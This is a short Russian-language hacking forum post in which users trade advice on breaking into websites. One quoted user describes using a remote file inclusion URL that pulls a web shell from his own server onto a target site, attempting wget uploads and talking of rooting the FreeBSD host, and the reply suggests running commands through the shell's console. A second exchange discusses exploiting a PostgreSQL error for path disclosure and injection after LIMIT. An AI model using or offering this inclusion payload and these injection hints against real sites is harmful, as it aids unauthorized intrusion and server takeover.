01.12.2012, 10:03
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от vaddd
http://site.ru/index.php?http://myserver.ru/sys12.txt
вижу свой шелл всо2, авторизируюсь - вижу листинг директорий
при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла
вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:
пытаюсть залиться туда wgetом - результата нет
пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(
сервак поидее можно порутать, FreeBSD 3.3-RELEASE
+ поставь действие по умолчанию в шелле - консолька, и через неё совершай действия.
Сообщение от None
Как можно использовать эту ошибку?
Цитата:
Warning: pg_query(): Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^ in /srv/www/htdocs/!sites/index.php on line 246 Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^
Минимум - раскрытие путей, максимум - возможная инъекция в LIMIT 1,[inject]. Но надо смотреть.
|
|
|